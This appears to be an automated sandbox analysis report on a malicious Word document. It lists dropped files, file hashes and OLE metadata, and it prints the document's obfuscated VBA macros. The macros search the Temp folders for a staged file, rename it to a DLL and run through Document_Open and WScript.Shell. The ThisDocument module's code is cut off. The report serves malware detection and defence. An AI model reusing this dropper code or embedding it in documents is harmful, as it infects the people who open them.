                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):314
                                          Entropy (8bit):4.803822695545621
                                          Encrypted:false
                                          SSDEEP:6:TMVBd6OjzVlNAUifYRZ5YUvLGDmaN4bJU6Yizg:TMHdtnGfYF/CSaibJUzf
                                          MD5:6B7A472A22FBDBFF4B2B08DDB4F43735
                                          SHA1:C6DF700168D3F5A90FF2713B78F8EF1446927102
                                          SHA-256:65F3CDBC4390C81B94FA960B7362917443FC1E6A51E3F81E4CB4C4DFA09DA4BE
                                          SHA-512:8D2E00954422F124CB1A7B969A728B3A6C9FB11C44623C1CDA33F2364E1C7CB101F6BF6C980E5F26368594F6CECED5C3D5E5A43327387554567BCDB5F1036740
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
                                          C:\Users\user\AppData\Local\Temp\msohtmlclip1\01\clip_image001.emz
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:gzip compressed data, max speed, from NTFS filesystem (NT)
                                          Category:modified
                                          Size (bytes):1215
                                          Entropy (8bit):7.720667879986562
                                          Encrypted:false
                                          SSDEEP:24:XC4nYSlgocPZuf07iaNOhRWR13JF/KAeSews/cidptM231HFZj08qR:XC4n3Go+Zumixa3JF/Kht/Rv5FZoh
                                          MD5:65AA45B1D2277144B80835615274A8EF
                                          SHA1:EDF5C95DC83A9AD19CAC33F76FEA0E65C87A7A62
                                          SHA-256:735F39F2AA363FB22BA36E411E63F522608F7180E6AB92E307378AB0ECB93770
                                          SHA-512:2E75733EAAAF96A8104F7C18C114DB0A993DBCEDF370763CB4AB64A15284389E0907C0AE3313DE1DBFD1CA645E2271DC59F7181D25B6C217AF814A7643BEF1B9
                                          Malicious:false
                                          Reputation:low
                                          Preview: ............k$E..kVW]_.U|e......A=x.=(,....{.| *...i7..$.g2............J@......$.$?....IL...w......W..M.R.C.B,g.........J5...J......C....&..B.1......~\=..1u'...c'.q3.W.+....?D.._z......{...)~......K.9...r.=h..9.....<.b..s..D..s...w...T[.`.._......wN_ma..x.g.m.d.|..i...3...=..._.....h.^z......R....t7.k>d....)......nG.....q..j.......j.N)..S.4Oh....M.=.T..:.....Q........koNzsY.e3..%.II&..t*).d.$.....tw%.+.).D.$:...M:....F.J[...[.".G/}}.R...k......=~y.O..b......C..).7...9/.?.../.e..-.z:....\.../.....rs...&]....G.[/.. .....p`.....P..a=...V5.....h...lo...P.............C.!..ak....A..s.r.......Q...|.....a.w.......|..\..@>.j........*.%..0......ltT........}/..zM...}..,'..h5~.....:....(......P..kx.....?11.{{.....@f...{....<x..x.p.ONL...6....}...............W..|..|0....G............O.Q.a#n...9`.|.s.OOO....w|>}....yoj....~$......*...>|.z^<....RiEJ+.i..^[]..O..ggf...wV..\.5i.#....(.t:$.O:.gg.......|...U.\*.dyyY.."..3.....9.x...3.Q..........
                                          C:\Users\user\AppData\Local\Temp\msohtmlclip1\01\clip_themedata.thmx
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:Microsoft OOXML
                                          Category:dropped
                                          Size (bytes):3104
                                          Entropy (8bit):7.632416686567842
                                          Encrypted:false
                                          SSDEEP:96:Q6Zjp6bfuijKIDa05vZep862Q9NAjCbxFpgNum:Q6/6rT5bk8xgNAORm
                                          MD5:2B26E4DD316F857EBB6E2B6B0E1E0282
                                          SHA1:581AE91D57A710CF31348CD5F5AB6FD1B081291E
                                          SHA-256:40BB5B5897D76A8EEFB7136E658BDDAA65F094C9689B931A78A01601F9EE02CB
                                          SHA-512:F097BEEC6E9E39E56DD1AF7DD1E02FE87DA3F818006E5B8B9377013E6FD039EE5765B3BDD7FBF96529C9988E2D7A75EA7300C7CA292DB9471ACE450E7582D0A0
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview: PK..........!.................[Content_Types].xml...N.0.E.H...-J..@.%...|..$....U..L.TB. .l,.3..;.r.......J..B+$..G]..7O.V....<a.......(7..I..R.{.pgL.=..r.....8..5v&.....uQ...8..C......X=....$..?6N.JC........F..B..'...+...Y.T....^e5.5.. ......._.g .-.;.....Yl....|6^.N...`.?.....[........PK..........!........6......._rels/.rels...j.0.....}Q...%v/..C/.}..(.h".....O..........=...... ......C?.h.v=......%.[xp..{._.P.<.1..H.0.....O.R.Bd....JE.4b$...q_......6L...R.7`.......0.O...,.E.n7.Li.b../.S...e...............PK..........!.ky..............theme/theme/themeManager.xml..M.. .@.}.w..7c.(Eb.....C..A......7....K.Y,....e.....|,....H..,l.....x.....I.sQ}#..... .+.!.,.^.$j=.GW...).E.+&..8........PK..........!.0.C)............theme/theme/theme1.xml.YOo.6....w toc'v..u...-M..n..i...P.@.I}.....a...m.a[....4.:l...GR..X^.6..>$...............!)O.^.r.C$.y@....../.yH*.....).......UDb.`}".q..J.....X^.)I`n.E....p).....li.V[].1M<........O.P..6r.=....z.gb.I.g....u.
                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\0427_5079687843613.LNK
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Thu Apr 29 14:15:29 2021, length=784384, window=hide
                                          Category:dropped
                                          Size (bytes):2108
                                          Entropy (8bit):4.503658357646499
                                          Encrypted:false
                                          SSDEEP:48:8qmu/XT3IkI0j+ZqQh2qmu/XT3IkI0j+ZqQ/:8qd/XLIkIbqQh2qd/XLIkIbqQ/
                                          MD5:53ECA5248AE0C970EDFD7E37B054874D
                                          SHA1:901118A1CE23DB752D663C5204AE794B98E5D2B6
                                          SHA-256:ABF9B2606A5C55348D739971EE3A49A8A1CD2D06B42D3F9238E7B0C1566FB1D6
                                          SHA-512:A3DEE5796BD84B186A73CC02741E6594DFB7E10C5C6F92BA27361D5E6A9E2B172CCA9DA1E91A0C0166E256FD3045A2CA349F95104A91FECC305ACEC97914F24E
                                          Malicious:false
                                          Reputation:low
                                          Preview: L..................F.... ....D..{...D..{.....}.=...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2......R.y .0427_5~1.DOC..Z.......Q.y.Q.y*...8.....................0.4.2.7._.5.0.7.9.6.8.7.8.4.3.6.1.3...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\928100\Users.user\Desktop\0427_5079687843613.doc.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.0.4.2.7._.5.0.7.9.6.8.7.8.4.3.6.1.3...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......928100..........D_....3N...W..
                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):92
                                          Entropy (8bit):4.3511064559072565
                                          Encrypted:false
                                          SSDEEP:3:M1VxJc0aTUMUlm0c0aTUMUlmX1VxJc0aTUMUlv:MJgzVzngz2
                                          MD5:7497C022A033D089796E8BCD0B7836E9
                                          SHA1:0188364DB33880EEEB5797EBB521424E205A931B
                                          SHA-256:881553C135F265B9AA3F3EB57798175973FEF557A7CD757987702F2CF8FB4C03
                                          SHA-512:0F63464A0D9441C0E702E5AFABCD7007C65C85ADAADC7FFC526D5F277EBBDF11DC91D2B21DBB150C0542DA0F4D16F326FADA99016B93C93818805F9EB62906B3
                                          Malicious:false
                                          Preview: [doc]..0427_5079687843613.LNK=0..0427_5079687843613.LNK=0..[doc]..0427_5079687843613.LNK=0..
                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):162
                                          Entropy (8bit):2.431160061181642
                                          Encrypted:false
                                          SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                          MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                          SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                          SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                          SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                          Malicious:false
                                          Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                          Category:dropped
                                          Size (bytes):2
                                          Entropy (8bit):1.0
                                          Encrypted:false
                                          SSDEEP:3:Qn:Qn
                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                          Malicious:false
                                          Preview: ..
                                          C:\Users\user\Desktop\~$27_5079687843613.doc
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):162
                                          Entropy (8bit):2.431160061181642
                                          Encrypted:false
                                          SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                          MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                          SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                          SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                          SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                          Malicious:false
                                          Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

                                          Static File Info

                                          General

                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: MyPc, Template: Normal.dotm, Last Saved By: MyPc, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Apr 27 13:05:00 2021, Last Saved Time/Date: Tue Apr 27 13:05:00 2021, Number of Pages: 1, Number of Words: 4, Number of Characters: 29, Security: 0
                                          Entropy (8bit):7.676875207184976
                                          TrID:
                                          • Microsoft Word document (32009/1) 54.23%
                                          • Microsoft Word document (old ver.) (19008/1) 32.20%
                                          • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                          File name:0427_5079687843613.doc
                                          File size:776192
                                          MD5:9585b5f35b03d5339fb26585134c55c6
                                          SHA1:33871087ad9d69c46b1280f350d2e00105617701
                                          SHA256:632752c9d2297bd6b6467bd7b93f10c99716456f31e4bf314794f2ab6aeed0a8
                                          SHA512:d2586532eac8bee6831a7d69db10e8d3c343a6e5f554d855313bad4151e315d114167b0193b8b7eeb0fb9e7c17a07f8e4191aae05f83f7c0e4815d0de90ba66f
                                          SSDEEP:12288:4BGIkuNR9rhD5+OrYDpLNrh6kchemn+EJA55tnIR9DUVWksA:4EIjNvrhFNrYDpLdlmnPJA7VMlCW
                                          File Content Preview:........................>.......................a...........m...............X...Y...Z...[...\...]...^..._...`...p...q...{......................................................................................................................................

                                          File Icon

                                          Icon Hash:e4eea2aaa4b4b4a4

                                          Static OLE Info

                                          General

                                          Document Type:OLE
                                          Number of OLE Files:1

                                          OLE File "0427_5079687843613.doc"

                                          Indicators

                                          Has Summary Info:True
                                          Application Name:Microsoft Office Word
                                          Encrypted Document:False
                                          Contains Word Document Stream:True
                                          Contains Workbook/Book Stream:False
                                          Contains PowerPoint Document Stream:False
                                          Contains Visio Document Stream:False
                                          Contains ObjectPool Stream:
                                          Flash Objects Count:
                                          Contains VBA Macros:True

                                          Summary

                                          Code Page:1252
                                          Title:
                                          Subject:
                                          Author:MyPc
                                          Keywords:
                                          Comments:
                                          Template:Normal.dotm
                                          Last Saved By:MyPc
                                          Revion Number:2
                                          Total Edit Time:0
                                          Create Time:2021-04-27 12:05:00
                                          Last Saved Time:2021-04-27 12:05:00
                                          Number of Pages:1
                                          Number of Words:4
                                          Number of Characters:29
                                          Creating Application:Microsoft Office Word
                                          Security:0

                                          Document Summary

                                          Document Code Page:-535
                                          Number of Lines:1
                                          Number of Paragraphs:1
                                          Thumbnail Scaling Desired:False
                                          Company:
                                          Contains Dirty Links:False
                                          Shared Document:False
                                          Changed Hyperlinks:False
                                          Application Version:1048576

                                          Streams with VBA

                                          VBA File Name: Module1.bas, Stream Size: 4103
                                          General
                                          Stream Path:Macros/VBA/Module1
                                          VBA File Name:Module1.bas
                                          Stream Size:4103
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . d . . . . . . . . . . . . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 16 03 00 06 f0 00 00 00 c2 06 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff f0 06 00 00 64 0d 00 00 01 00 00 00 01 00 00 00 d3 5d bd bf 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 10 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          Folders(N))
                                          String)
                                          Error
                                          VB_Name
                                          CreateObject(polo)
                                          f.SubFolders
                                          Folder
                                          "\ferus.d"
                                          Preserve
                                          kurlbik
                                          String
                                          Local
                                          RootPath
                                          Folders()
                                          strFileExists
                                          Dir(kurlbik
                                          ReDim
                                          Application.Run("hi",
                                          Getme(RootPath
                                          "\furmt.f"
                                          Dir(RootPath
                                          Folders(N)
                                          Attribute
                                          Resume
                                          fs.GetFolder(Folder)
                                          RootPath)
                                          Dir(nvbv
                                          "Scripting.FileSystemObject"
                                          Dir(Folders(N)
                                          VBA Code
                                          Attribute VB_Name = "Module1"
  
Dim Folders() As String
Dim pit As String
Sub Getme(RootPath As String)
Dim pafh As String
pafh = pit
hor = pafh
Dim polo As String
polo = "Scripting.FileSystemObject"
Dim uuj As String
uuj = "\furmt.f"
strFileExists = Dir(RootPath & uuj)
      If strFileExists = "" Then
    
Dim Folder As String
Folder = RootPath
    Dim N%
    Dim fs, f, f1, fc
 
    Set fs = CreateObject(polo)
    Set f = fs.GetFolder(Folder)
    Set fc = f.SubFolders
 
    N = 0
    On Local Error Resume Next
    For Each f1 In fc
      N = N + 1
      ReDim Preserve Folders(1 To N) As String
      Folders(N) = Folder & "\" & f1.Name
       If Dir(Folders(N) & "\" & uuj) = "" Then
            Else
                Dim kurlbik As String
    kurlbik = hor
      If Dir(kurlbik & "\ferus.d" & "l" & "l") = "" Then
      
       kkl = Application.Run("hi", Folders(N))

      Else
      Exit Sub
  End If
              End If
  
   Next f1

    Else
     Dim nvbv As String
    nvbv = hor
      If Dir(nvbv & "\ferus.d" & "l" & "l") = "" Then
      
       kkl = Application.Run("hi", RootPath)

      Else
      Exit Sub
  End If
        End If


End Sub



Sub q2(dl As String)
pit = dl
End Sub
                                          VBA File Name: Module2.bas, Stream Size: 3810
                                          General
                                          Stream Path:Macros/VBA/Module2
                                          VBA File Name:Module2.bas
                                          Stream Size:3810
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 16 03 00 06 f0 00 00 00 b2 06 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff e0 06 00 00 b0 0c 00 00 02 00 00 00 01 00 00 00 d3 5d 9d 64 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          String)
                                          VB_Name
                                          hi(myhome
                                          "\ferus.d"
                                          vbDirectory)
                                          Application.Run("nyd",
                                          Dir(Left(jos,
                                          String
                                          Left(klas,
                                          myhome,
                                          Selection.TypeBackspace
                                          Integer
                                          hhhhh()
                                          ntgs)
                                          "\Te"
                                          Application.Run("Getme",
                                          While
                                          Attribute
                                          VBA Code
                                          Attribute VB_Name = "Module2"
Dim pit As String

Sub hhhhh()
Dim sda
Dim posl As String
Dim pafh As String
Dim ntgs As Integer

pafh = pit
posl = pafh

Dim bcs As String
bcs = "al" & "\Te"


Dim yer As String
yer = "L" & "o" & "c" & bcs & "mp"




Call cvbc
    ntgs = 50
sda = 49
Dim jos As String

jos = posl

While sda < 50
      ntgs = ntgs - 1

      If Dir(Left(jos, ntgs) & yer, vbDirectory) = "" Then
        
    Else
  
   sda = 61
    End If

   Wend
   Dim klas As String
   klas = posl
   Dim bcsa As String
bcsa = Application.Run("Getme", Left(klas, ntgs) & yer)
  Selection.TypeBackspace
   

End Sub






Sub hi(myhome As String)
Dim plop As String
Dim pafh As String
pafh = pit
plop = pafh
Dim kkx As String
kkx = Application.Run("nyd", myhome, plop & "\ferus.d" & "l" & "l")
End Sub




Sub q3(dl As String)
pit = dl
End Sub
                                          VBA File Name: Module3.bas, Stream Size: 4198
                                          General
                                          Stream Path:Macros/VBA/Module3
                                          VBA File Name:Module3.bas
                                          Stream Size:4198
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . . . . . . . . . . . . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 16 03 00 06 f0 00 00 00 8a 07 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff b8 07 00 00 54 0e 00 00 05 00 00 00 01 00 00 00 d3 5d b5 d6 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          String,
                                          String)
                                          Unit:=wdCharacter,
                                          Dir(sf
                                          VB_Name
                                          Application.Run("nm",
                                          ololow
                                          nyd(uuu
                                          ololow)
                                          rnee(uuu,
                                          String
                                          nothings
                                          Unit:=wdLine,
                                          "\furmt.f")
                                          Dir(nothings)
                                          Selection.Copy
                                          Selection.TypeBackspace
                                          cvbc()
                                          rnee(myhome
                                          lassap
                                          "\furmt.f"
                                          Selection.MoveRight
                                          aaaa)
                                          bcvxzc()
                                          myhome
                                          Attribute
                                          checkthe(sf
                                          bcvxzc
                                          Selection.MoveDown
                                          VBA Code
                                          Attribute VB_Name = "Module3"

Dim pit As String












Sub checkthe(sf As String)

Dim pafh As String
pafh = pit
Dim lassap As String

  
Dim ololow As String
ololow = sf
Dim nothings As String
nothings = 2

    If Dir(sf & "\furmt.f") = "" Then
    
    Else
         If Dir(nothings) = "" Then

      lassap = Application.Run("nm", ololow)
    Else
   Exit Sub
    End If
  
    End If
End Sub



Sub nyd(uuu As String, aaaa As String)

Call rnee(uuu, aaaa)
End Sub



Sub rnee(myhome As String, hsa As String)

Name myhome & "\furmt.f" As hsa
End Sub



Sub bcvxzc()
    Selection.MoveRight Unit:=wdCharacter, Count:=5
    Selection.MoveDown Unit:=wdLine, Count:=23
    Selection.MoveRight Unit:=wdCharacter, Count:=51
       Selection.TypeBackspace
   Selection.Copy

End Sub




Sub cvbc()
Selection.MoveDown Unit:=wdLine, Count:=1
    Selection.MoveRight Unit:=wdCharacter, Count:=5
    Selection.MoveDown Unit:=wdLine, Count:=23
    Selection.MoveRight Unit:=wdCharacter, Count:=51
 Selection.MoveDown Unit:=wdLine, Count:=23
Call bcvxzc
End Sub



Sub q4(dl As String)
pit = dl
End Sub
                                          VBA File Name: Module4.bas, Stream Size: 1697
                                          General
                                          Stream Path:Macros/VBA/Module4
                                          VBA File Name:Module4.bas
                                          Stream Size:1697
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] . ; . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 16 03 00 06 f0 00 00 00 9a 04 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff c8 04 00 00 04 06 00 00 01 00 00 00 01 00 00 00 d3 5d 9d 3b 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          String
                                          "\furmt.f"
                                          String)
                                          Attribute
                                          VB_Name
                                          "ferus.d"
                                          ololow
                                          nm(ololow
                                          VBA Code
                                          Attribute VB_Name = "Module4"
Dim pit As String


Sub q5(dl As String)
pit = dl
End Sub

Sub nm(ololow As String)
  Name ololow & "\furmt.f" As pit & "\" & "ferus.d" & "l" & "l"
End Sub
                                          VBA File Name: Module5.bas, Stream Size: 705
                                          General
                                          Stream Path:Macros/VBA/Module5
                                          VBA File Name:Module5.bas
                                          Stream Size:705
                                          Data ASCII:. . . . . . . . . : . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . ] b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 16 03 00 01 f0 00 00 00 3a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 41 02 00 00 95 02 00 00 00 00 00 00 01 00 00 00 d3 5d 62 ed 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          Attribute
                                          VB_Name
                                          VBA Code
                                          Attribute VB_Name = "Module5"
                                          VBA File Name: Module6.bas, Stream Size: 705
                                          General
                                          Stream Path:Macros/VBA/Module6
                                          VBA File Name:Module6.bas
                                          Stream Size:705
                                          Data ASCII:. . . . . . . . . : . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . ] , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 16 03 00 01 f0 00 00 00 3a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 41 02 00 00 95 02 00 00 00 00 00 00 01 00 00 00 d3 5d 2c b2 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          Attribute
                                          VB_Name
                                          VBA Code
                                          Attribute VB_Name = "Module6"
                                          VBA File Name: ThisDocument.cls, Stream Size: 8548
                                          General
                                          Stream Path:Macros/VBA/ThisDocument
                                          VBA File Name:ThisDocument.cls
                                          Stream Size:8548
                                          Data ASCII:. . . . . . . . . . . . . . . . . b . . . L . . . Z . . . . . . . . . . . . . . . . ] . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . I . . . . . . . . 7 [ . ! z l . D . . m 2 . X . . . . . . . . . . . . . . . . . . . . . . . . . < . g . O . . . K . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . < . g . O . . . K . . . T . . . . Q . . I . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 16 03 00 06 00 01 00 00 0c 10 00 00 e4 00 00 00 62 02 00 00 4c 11 00 00 5a 11 00 00 fe 1c 00 00 04 00 00 00 01 00 00 00 d3 5d a5 24 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff c0 00 ff ff 00 00 05 1a 0d e9 51 89 c5 49 98 a6 17 de ca cd 81 a9 37 5b 03 21 7a 6c de 44 89 e7 6d 32 c2 58 94 a5 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          ksa()
                                          jkjhb
                                          ",YYUNXEGQRYS"
                                          Object
                                          iep()
                                          bfdsdadad
                                          werfsxv
                                          xcvxv
                                          Document_Open()
                                          luyhgdffs
                                          jkjhbf
                                          False
                                          xcvxv.Run
                                          String)
                                          stetptwwo
                                          String
                                          htyhbv
                                          VB_GlobalNameSpace
                                          vvvvvvvx
                                          hgvmbm
                                          "ThisDocument"
                                          VB_Base
                                          bcvsdsf
                                          chek()
                                          Dir(jos
                                          VB_Creatable
                                          VB_Exposed
                                          Options.DefaultFilePath(wdAutoRecoverPath)
                                          Left(askl,
                                          "\ferus.d"
                                          vvvvvvvx()
                                          nmbvd
                                          Integer
                                          hhhhh
                                          oloow
                                          hgfcvxv
                                          kjhnbs
                                          Attribute
                                          VB_PredeclaredId
                                          VB_Name
                                          VBA.CreateObject("WScript.Shell")
                                          stetptwwo()
                                          VB_Customizable
                                          xzczxc
                                          bcvxz
                                          VB_TemplateDerived
                                          xzczxc()
                                          wrefs
                                          Private
                                          erfvbcz
                                          VBA Code
                                          Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Dim ji As Integer
Dim pit As String
Dim r1, r2 As String
